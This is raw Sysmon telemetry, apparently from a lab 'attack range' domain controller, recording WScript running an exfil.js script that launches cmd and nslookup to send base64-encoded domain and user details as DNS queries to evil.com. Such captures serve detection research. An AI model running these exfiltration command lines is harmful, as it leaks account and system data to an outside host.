14:21:36.644{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.644{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.644{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.644{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5F44-000000005F02}5696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.644{2E1864BB-18E0-629A-6742-000000005F02}39767528C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-5F44-000000005F02}5696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.658{2E1864BB-18F0-629A-5F44-000000005F02}5696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpugr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.644{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlctow.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.628{2E1864BB-18F0-629A-5D44-000000005F02}61164708C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-5E44-000000005F02}4908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.613{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.613{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.613{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.613{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.613{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5E44-000000005F02}4908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.613{2E1864BB-18F0-629A-5C44-000000005F02}59564768C:\Windows\system32\cmd.exe{2E1864BB-18F0-629A-5E44-000000005F02}4908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.626{2E1864BB-18F0-629A-5E44-000000005F02}4908C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-5C44-000000005F02}5956C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlctow.tmp 2>&1 10341000x8000000000000000210744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.597{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-5D44-000000005F02}6116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.597{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-5D44-000000005F02}6116C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.597{2E1864BB-18F0-629A-5D44-000000005F02}61164708C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-5C44-000000005F02}5956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.581{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5D44-000000005F02}6116C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.581{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.581{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.581{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.581{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.581{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5C44-000000005F02}5956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.581{2E1864BB-18E0-629A-6742-000000005F02}39767668C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-5C44-000000005F02}5956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.588{2E1864BB-18F0-629A-5C44-000000005F02}5956C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlctow.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.581{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfoxb.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.560{2E1864BB-18F0-629A-5A44-000000005F02}59764296C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-5B44-000000005F02}2568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.560{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.560{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 